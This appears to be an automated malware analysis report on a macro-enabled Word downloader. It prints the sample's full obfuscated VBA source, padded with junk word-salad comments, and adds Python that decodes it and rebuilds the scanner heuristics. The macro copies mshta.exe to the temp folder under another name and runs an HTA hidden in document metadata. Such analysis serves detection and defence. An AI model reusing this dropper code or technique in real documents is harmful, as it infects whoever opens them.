Verdict: MALICIOUS
Risk score: 138
Heuristics: 6
- ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0.
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). The document contains a VBA project (word/vbaProject.bin); VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  Call CreateObject("ws" + a6FQl + "ell").run(acvQg)
  The ProgID is assembled at runtime: with a6FQl = "cript.sh" (see the extracted source below) it evaluates to "wscript.shell", so this is a WScript.Shell.Run call whose command line is returned by acvQg.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
  Sub AutoOpen()
  AutoOpen fires when the document is opened with macros enabled and calls arYTmb, the routine that ends in the Run call above.
- Environ() call, environment variable access (low, OLE_VBA_ENVIRON). Matched line in script:
  atkc9E = Environ(aPyUC7)
  This wrapper is called from aGAh0 with the decoded names "windir" and "temp" to build the paths the macro copies from and writes to.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OOXML body / shared strings), none is labelled as reached from the macro, and all of them are XML namespace URIs (Office Open XML, DrawingML and WordprocessingML schemas, plus XMP/RDF/Dublin Core namespaces typically carried by an embedded image's metadata). They appear in ordinary .docx files and are not network indicators for this sample.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
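The report's keyword heuristics and its URL note can be reproduced on extracted macro text without the analyzer. The Python below is an editor's example, not code from the report or its engine: the three OLE_VBA_* rule ids and severities are taken from the findings above, CREATEOBJ_CONCAT_PROGID is a hypothetical extra rule for a ProgID built from string fragments, the namespace host list is an assumption drawn from the URLs listed in this report, and the sample VBA and URL inputs (including the example.com entry) are constructed.

```python
"""Editor's example: re-run the report's VBA keyword heuristics and URL triage on extracted text."""
import re
from urllib.parse import urlsplit

# Rule ids and severities taken from the report; CREATEOBJ_CONCAT_PROGID is a hypothetical
# extra rule that fires only when the ProgID is concatenated at runtime ("ws" + x + "ell").
VBA_RULES = [
    ("OLE_VBA_AUTOOPEN", "low", re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+AutoOpen\s*\(", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_ENVIRON", "low", re.compile(r"\bEnviron\s*\(", re.I)),
    ("CREATEOBJ_CONCAT_PROGID", "high", re.compile(r"\bCreateObject\s*\(([^)]*[+&][^)]*)\)", re.I)),
]

# Hosts that carry only XML namespace URIs in Office documents and image metadata (assumed list).
NAMESPACE_HOSTS = {
    "schemas.microsoft.com", "schemas.openxmlformats.org", "www.w3.org", "ns.adobe.com", "purl.org",
}


def scan_vba(source: str) -> list:
    """Return (rule_id, severity, line_no, line) for every rule hit, one entry per matching line."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for rule_id, severity, pattern in VBA_RULES:
            if pattern.search(line):
                findings.append((rule_id, severity, no, line.strip()))
    return findings


def classify_urls(urls: list) -> dict:
    """Split extracted URLs into namespace noise and candidate network indicators."""
    out = {"xml-namespace": [], "network-indicator": []}
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        bucket = "xml-namespace" if host in NAMESPACE_HOSTS else "network-indicator"
        out[bucket].append(url)
    return out


def max_severity(findings: list) -> str:
    """Highest severity among the findings, 'info' when there are none."""
    order = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
    return max((f[1] for f in findings), key=order.get, default="info")


# Constructed input: the matched lines quoted in the report, plus one URL on example.com
# (a reserved documentation domain, not from the sample) so the URL split has something to show.
SAMPLE_VBA = """Sub AutoOpen()
arYTmb
End Sub
Function atkc9E(aPyUC7)
atkc9E = Environ(aPyUC7)
End Function
Sub arYTmb()
Call CreateObject("ws" + a6FQl + "ell").run(acvQg)
End Sub
"""
SAMPLE_URLS = [
    "http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
    "http://ns.adobe.com/xap/1.0/",
    "http://purl.org/dc/elements/1.1/",
    "http://example.com/stage2",  # constructed, not from the sample
]

if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for rule_id, severity, no, line in hits:
        print(f"{rule_id:24} {severity:5} line {no}: {line}")
    print("highest severity:", max_severity(hits))
    for bucket, urls in classify_urls(SAMPLE_URLS).items():
        print(f"{bucket}: {len(urls)}")
```

The point of the extra rule is that a bare CreateObject hit is common in benign macros, while a ProgID that only exists after concatenation almost never is; scoring the two differently is what lets a triage step rank this sample above ordinary automation documents. The URL bucket is the same caveat the report states: namespace URIs are noise, and only URLs outside those hosts (or URLs labelled as reached from the macro channel) deserve a lookup.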
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11246 bytes | fd4ab11f8b349d048295a7e5ad744ed27b286721a9b9cc98bbc2181a57bb2447 |

Preview script: first 1,000 lines of the extracted macros.bas
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "arnbQZ"
Sub AutoOpen()
' Dwindle physique regional laconically luck godlike
arYTmb
End Sub
Attribute VB_Name = "abejEy"
Public Const a12vR As String = ""
Public Const aMdmA As Integer = 1657 - 1644
Public Const aTngC As String = "1ridn1iw1"
Public Const aZBkFT As String = "231met1sys1"
Public Const aUyTM As String = "p1m1e1t"
Public Const a6FQl As String = "cript.sh"
Function aCD423()
' Interposition avant mens
End Function
Sub awvNT3(aNIJp3)
' Stimulate giver deer downtown geographic
' Aromatic mexico supply esquire inns
' Marking dolphin tide miner ween recalcitrant
' Assessing eligible meaningless calculator discordant hunger
' Selfishly beguiling scaffolding
' Gate mammals
' Chunk fifth
' Shadow informed idiocy difficulties preposition rave
' Geography venial
' Busts cryptic downloading
' Michelle unhindered faqs bruise recipient succumb
' Pts crypt
' Federal
' Loft unmarked
' Yuan notebooks artificers derek
' Broker akimbo titten clipped supplemental
' Regularly flooring electro whale livecam
' Sofia
' Pine loft
' Radius
' Objectively decade scald
' Upholstery protoplasm
' Correction burthen
' Eph. logging capability convocation
' Clout trojan
' Vp lite jeep school intractable
' Token beneficiary cleanse
' Zion barbie ethical depressing
' Great thongs
' Retired wrapped loot
' Calls plebeian
' Subscribe conventual abaft
' Nicaragua
' Rumania
' Impolite brazilian bedford competitive
' Unimpeachable accuracy borrower
' Clocks omaha linked turkey src kirk
' Obituaries pharmaceuticals chicken commonly bind
' Customs to scenarios aged
' Eclipse subterfuge
' Validity overthrew
' Georgetown aberration patio inside
' Palaver
' Org gib aristocrat reconsider
' Expenditure population inaugurate invoice thompson
' Wooden mit hamper
' Enlightenment balance concomitant tie establish
' Cancer probably tongs
' Oligarchy fungi preceding gon consequences scenic
' Tickets psychiatry
' Dignify adapter software
' Discovery malefactor pique tiller
' Harboured nodes ax qualify
' Mulberry valencia plover paralyze impersonal outsider
' Enable cumshot wane
' Project pope caution
' Hunts roped suck replete viral
' Dyke tramadol utils
' Setup palaver ira griffiths
' Frequency upturned conscripts shower formulate
' Plait packed orientation antonio genealogy
' Sailing depreciate treasurer dragoon
' Starred
' Relentlessly mongolian scene lenses xerxes
' Curious
' Effusion wrench experiencing steerage
' Ope blockade
End Sub
Function aX9Yn(aHsQG4)
' Chios tumor
' Tartarus betake impostor abeyance beverage
' Hatch timber
' Montana jamaica version
' Proverbs zoological
' Palmer tingle
' Vcr folder scared domino cattle isaac republicans
' Settlement worry
' Validity
' Practice foal noblemen ventral
aX9Yn = ActiveDocument.BuiltInDocumentProperties(aHsQG4)
End Function
Public Sub aW2Q9j()
a5GOg
End Sub
Public Sub a31lw()
' Accordance crackers turpentine
aKDxW
End Sub
Attribute VB_Name = "ajSK6"
Public Function ag8LpE(ayiIK, aHk5l)
' Overlap std titans
' Firewire ever plenipotentiary
' Nest hudson
' Terse conventual
' Appearing
' Piston hierarchy
' Phases grab
' Resentful translation
' Bikes caribou electorate chic woof took
' Provinces myrtle qualifying
' Rings aboriginal gossip
' Project
' Webmaster kinda concomitant
' Seville libya area
' Pegasus crossword bootless dial geo knowledge
' Flu abase fantasy evergreen
' Comparison negotiations harass preparing
' Attract hating
' Lc statement tanner
' Instantaneous calm priestess subway baritone houses
' Spain unwell
' Waken default
' Leash continent
' Programme open-hearted accounting
' Repeal idaho isle cranny
' Soldiery aztec hundredth lightning
' Recipes lane abaft hip mia
' Bend invite gen ingredient materialistic foible gmc
' Pact shutter length tones jacob acropolis
' Nd incentive
' Incest extremely encompass everyday quote
' Bones lucid morning also
FileNumber = FreeFile
Open ayiIK For Output As #FileNumber
' Typing do symmetrical applications
Print #FileNumber, aHk5l
Close #FileNumber
End Function
Sub akvIyn(aqalH, akcIU)
' Zephyr tier rhythmic juicy
' Turtle porphyry daisy
FileCopy aqalH, akcIU
End Sub
Function a12lJ(aBEnk)
a12lJ = aBEnk
End Function
Function aYidXV(aBEnk) As String
Dim aGJxV As Long
Dim aL0hG As Integer
Dim azqxw As Integer
For aGJxV = 1 To Len(aBEnk)
azqxw = 0
' Nehemiah
agSlux = Mid(aBEnk, aGJxV, 1)
aL0hG = Asc(agSlux)
' Singer janitor dialectic
' Determination proportional could dicks
' Nebuchadnezzar ty chess dumfounded necessitate
' Illiterate represented liked
' Rivulet concurrence sheffield
' Seeds storey
' Eel proximate
' Conspire thehun
' Chair undecided non-commissioned
' Tiles figuratively owners poll
' Fidget embellish hilarious distraction
If (aL0hG > a6jAaR(10968 - 10967) And aL0hG < a6jAaR(-2112 + 2114)) Or (aL0hG > a6jAaR(2782 - 2779) And aL0hG < a6jAaR(6619 - 6615)) Then
azqxw = aMdmA
aL0hG = akJ8O5(aL0hG, azqxw)
' Plowing inborn algebra proffer
' Washington ancestry hubbub watched
' Overthrew mediation sonny inspector
' Dependency gully constellations athena
' Disable milfhunter elusive superseded cables velocity
' Australia shadow scandals
' Trill
' Umpire limiting
' Jokes maximilian so economic
' Overrun subject-matter jersey asn eddie
' Loth pants ladylike casey
If aL0hG < a6jAaR(5) And aL0hG > 83 Then
aL0hG = aMgI4N(aL0hG)
ElseIf aL0hG < -252 + 317 Then
aL0hG = aMgI4N(aL0hG)
End If
End If
a2voU = aZ6s9K(aL0hG)
Mid$(aBEnk, aGJxV, 1) = a12lJ(a2voU)
Next aGJxV
aYidXV = aBEnk
End Function
Attribute VB_Name = "akyLIF"
Function aulWZ(aPzpQD)
' Lou fils vigilant
' Van
' Spalding springs unobtrusive
' Wove
' Tarnish severe slav
' Dominican scurry arid postage
' Mattress arrangements princess reading honolulu iso operational
' Showed headed
' Cayman suzerain alexandra
' Leo hostels mayor unmerciful plants
' Authoritative nickel
ab0HYc = aPzpQD
aYvIb = Len(ab0HYc)
For awZDNv = 0 To aYvIb - 1
' Techno irate
' Merely decoction
' Foot sarcastically
' Renewable epitome
' Ut ve
' Vespers
' Rheumatic cr. chaplet climber yawned fiji
' Alienation beeves blogger basal
' Ultimatum manipulate la cw recrimination represent
' Chancery insincerity glowered
' Imagery food nuke
aDhQt = aDhQt & Mid(ab0HYc, (aYvIb - awZDNv), 1)
Next awZDNv
aulWZ = aDhQt
End Function
Public Function aysAeK(an59wH)
aysAeK = Replace(an59wH, a12vR, "")
End Function
Sub arYTmb()
' Enter muss reporting quantities lands
' Homeless faithfulness rehearsal
' Telephone courtier repudiate
' Manifesto sinewy flexible foxes
' Tenacious americans howls
' Chuck
' Association
' Clemency horsehair
' Joe. friends richardson
' Deputy involved fan fails integrity
' Vulgarity wiring
aW2Q9j
a31lw
' Postpone larynx superb commons pusillanimous
' Andrea unattractive
' Two allurement hosts traffic
' Reprints
' Prizes emphasis puerile guitar digit deafening
' Equal icelandic viking witch thoughtlessness psychological moisture
' Drill levitra persons
' Ieee predilection recorders
' Glorification watershed reform activists
' Inoculation js hottentot champion
Call CreateObject("ws" + a6FQl + "ell").run(acvQg)
End Sub
Attribute VB_Name = "aa7iLD"
Function atkc9E(aPyUC7)
atkc9E = Environ(aPyUC7)
End Function
Function a1znxD()
With Application
a1znxD = .PathSeparator
End With
End Function
Function aGAh0(aKfYD)
' Toward listening ball
aJfme = VBA.Split(aulWZ("lmth.ni|moc.ni|exe.athsm"), "|")
' Amass diego
' Bail slouch earrings
' Marl bicycle top gratuitous
' Produces prevent clod interrogation
' Ply registration precursor garish educated
' Steering madrid
' Affray allow
' Merge archduke impulsive
' Championships deviate baths compliant
' Massage inquiries immodest
' Vibrating dictionaries mo
' Asphalt than unremitting
Select Case aKfYD
Case 0:
' Sync vulture
aGAh0 = atkc9E(Replace(aulWZ(aTngC), "1", "")) & a1znxD & Replace(aulWZ(aZBkFT), "1", "") & a1znxD & aJfme(0)
' Blithe bytes squatter endorsed flakes
Case 1:
' Importance glum
' Castaway devon meanwhile
' Tumor resume security
' Peter nails edited inaugurate
' Unavoidable maker baseline
' Indianapolis exotic psyche arizona
' Baiting henry bad
' Superman bridge
' Americas decrepit burglary
' Fighting misconception circa reduce
aGAh0 = atkc9E(Replace(aulWZ(aUyTM), "1", "")) & a1znxD & aJfme(1)
' Tine coastal brimstone
' Mechanical lecture
' Errant suit bring days
' Calvin primordial
' Superfluity concert wag hunts
' Khaki mel univ seneschal hour modicum
' Primacy
' Producers bow panther bulbous
' Independence dash dividend
' Stocking hereupon tray
' Sunflower qualifying
' Inimitable fulfill marathon kith edict
' Alarm grannie seconds ailing sufficiency bulk
' Suns mp bb
' Badness sponsor gallon un
' Infinity recur
' Laudable designing truculent unconsciousness
' Session yeh recitation
' Ba divorced
' Grant
' Judgement
' Hulk sprinkling
Case 2:
aGAh0 = atkc9E(Replace(aulWZ(aUyTM), "1", "")) & a1znxD & aJfme(2)
End Select
End Function
Sub aKDxW()
aJF0o = agniQo(aGAh0(2))
ag8LpE aJF0o, aYidXV(aX9Yn("category"))
End Sub
Attribute VB_Name = "aUZMBv"
Function afHCUy(aZ7sb)
' Corsican
' Hd intent consign
' Halloween solstice outlying
' Macintosh
' Anniversary appendix adele jess behaviour
' Bianca objecting gaps lunch mods tires
' Substances shame
' Boolean ant excessive
' Butchers sprinkle acidity ceo
' Johannes bridget ashy
' Evade informative character formatting
afHCUy = (aysAeK(aZ7sb))
End Function
Function aP9Qjq(aBMZwl)
' Burn sophistry animus
' Maddening hellish
' Hanging promised discriminate
' Plug strengthening publish sixty-four
' Kabul passengers forum ward
' Nag stephanie pave pebble encroach
' Inane remix disposal
' Self-defense clearing popularity overrun
' Labs whats north-western margaret offer
' Melissa porcelain basis march rumania
aP9Qjq = (aysAeK(aBMZwl))
End Function
Function agniQo(aqeLUA)
' Highways qty indian behavior
agniQo = (aysAeK(aqeLUA))
End Function
Function acvQg()
aPUCNq = aP9Qjq(aGAh0(1))
aP5eWp = agniQo(aGAh0(2))
acvQg = aPUCNq & " " & aP5eWp
End Function
Attribute VB_Name = "aYADsm"
Sub a5GOg()
aQOBS5 = afHCUy(aGAh0(0))
aiVtUO = aP9Qjq(aGAh0(1))
akvIyn aQOBS5, aiVtUO
End Sub
Function aMgI4N(a6jen)
aMgI4N = a6jen + 18174 / 699
End Function
Function a6jAaR(aCOcY)
If aCOcY = 0 Then
a6jAaR = 17990 / 17990
ElseIf aCOcY = 1 Then
a6jAaR = 35 + 29
ElseIf aCOcY = 2 Then
a6jAaR = -231 + 322
ElseIf aCOcY = 3 Then
a6jAaR = 29376 / 306
ElseIf aCOcY = 4 Then
a6jAaR = 9 + 114
ElseIf aCOcY = 5 Then
a6jAaR = 97 * 1
Else
a6jAaR = 1033 - 9
End If
End Function
Function akJ8O5(a6jen, amc7g)
akJ8O5 = a6jen - amc7g
End Function
Function aZ6s9K(a6jen)
aZ6s9K = VBA.ChrW(a6jen)
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 48128 bytes | aa9a8a5ed688710d66f76e4249064620c9d617a5ada2033933af4a96d79a21bf |
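The extracted source above hides its intent behind reversed strings padded with "1", a lookup table of arithmetic constants, and a per-character decoder applied to the document's "category" property. The Python below is an editor's worked example, not part of the report or the sample: it re-implements those helpers statically so the dropped paths and the final command line can be recovered without opening the document. The constants are copied from the macro; the environment values, the backslash path separator, and the Category property contents are constructed placeholders (the report does not show the sample's real property value).

```python
"""Editor's example: static re-implementation of the sample's decoding helpers."""
import codecs

# Constants copied from the abejEy module of the extracted macro.
A12VR = ""                       # a12vR: aysAeK strips this; empty, so aysAeK is a no-op
AMDMA = 1657 - 1644              # aMdmA = 13, the shift applied by aYidXV
ATNGC = "1ridn1iw1"              # aTngC  -> "windir" after aulWZ + Replace("1", "")
AZBKFT = "231met1sys1"           # aZBkFT -> "system32"
AUYTM = "p1m1e1t"                # aUyTM  -> "temp"
A6FQL = "cript.sh"               # a6FQl  -> "ws" + a6FQl + "ell" = "wscript.shell"
AJFME_RAW = "lmth.ni|moc.ni|exe.athsm"   # reversed and split on "|" inside aGAh0
PATH_SEP = "\\"                  # Application.PathSeparator on Windows (a1znxD), assumed


def aulwz(s: str) -> str:
    """aulWZ: reverse the string."""
    return s[::-1]


def unpad(s: str) -> str:
    """Replace(aulWZ(s), "1", ""): reverse, then drop the '1' padding characters."""
    return aulwz(s).replace("1", "")


def aysaek(s: str) -> str:
    """aysAeK: Replace(s, a12vR, ""). With a12vR = "" it returns s unchanged;
    afHCUy, aP9Qjq and agniQo are all thin wrappers around it."""
    return s.replace(A12VR, "") if A12VR else s


def a6jaar(i: int) -> int:
    """a6jAaR: threshold table, with the macro's arithmetic evaluated."""
    return {0: 1, 1: 64, 2: 91, 3: 96, 4: 123, 5: 97}.get(i, 1024)


def ayidxv(s: str) -> str:
    """aYidXV: per-character decoder applied to the 'category' document property.

    ASCII letters (65..90, 97..122) are shifted back by aMdmA (13) and wrapped into
    their case range by aMgI4N (+26, since 18174 / 699 = 26); other characters pass through.
    """
    out = []
    for ch in s:
        k = ord(ch)
        if a6jaar(1) < k < a6jaar(2) or a6jaar(3) < k < a6jaar(4):
            k -= AMDMA                       # akJ8O5
            if 83 < k < a6jaar(5):           # fell below 'a': wrap within lowercase
                k += 26
            elif k < -252 + 317:             # fell below 'A': wrap within uppercase
                k += 26
        out.append(chr(k))                   # aZ6s9K = ChrW
    return "".join(out)


def agah0(which: int, env: dict) -> str:
    """aGAh0: build the three paths the macro uses; `env` stands in for Environ()."""
    names = aulwz(AJFME_RAW).split("|")      # ["mshta.exe", "in.com", "in.html"]
    if which == 0:
        return env[unpad(ATNGC)] + PATH_SEP + unpad(AZBKFT) + PATH_SEP + names[0]
    if which == 1:
        return env[unpad(AUYTM)] + PATH_SEP + names[1]
    return env[unpad(AUYTM)] + PATH_SEP + names[2]


def reconstruct(env: dict, category_property: str) -> dict:
    """Trace AutoOpen -> arYTmb without side effects and report what each step would do."""
    copy_src = aysaek(agah0(0, env))          # a5GOg: FileCopy source
    copy_dst = aysaek(agah0(1, env))          # a5GOg: FileCopy destination
    dropped = aysaek(agah0(2, env))           # aKDxW: file written by ag8LpE
    return {
        "prog_id": "ws" + A6FQL + "ell",      # CreateObject(...) target
        "copy_src": copy_src,
        "copy_dst": copy_dst,
        "dropped_file": dropped,
        "dropped_content": ayidxv(category_property),
        "command": copy_dst + " " + dropped,  # acvQg, passed to WScript.Shell.Run
    }


# Constructed inputs: a plausible environment and a placeholder Category value encoded the
# way the macro expects. The report does not show the sample's real property value.
SAMPLE_ENV = {"windir": "C:\\Windows", "temp": "C:\\Users\\victim\\AppData\\Local\\Temp"}
SAMPLE_CATEGORY = codecs.encode("<html><script>// placeholder HTA body</script></html>", "rot13")

if __name__ == "__main__":
    for key, value in reconstruct(SAMPLE_ENV, SAMPLE_CATEGORY).items():
        print(f"{key:16} {value}")
```

Run against the constructed environment, the trace shows the whole chain: mshta.exe is copied from %windir%\system32 to %TEMP%\in.com, the decoded Category property is written to %TEMP%\in.html, and WScript.Shell.Run launches "in.com in.html", i.e. a renamed mshta executing an HTA carried in the document's own metadata. Because aYidXV reduces to ROT13 over ASCII letters, `codecs.decode(category, "rot13")` on the property pulled from docProps/core.xml gives the same plaintext, which is a quick manual check for related documents; in detection terms the stronger signals are a copy of mshta.exe to a user-writable path under a .com name and a process tree of WINWORD.EXE launching that copy with an .html argument.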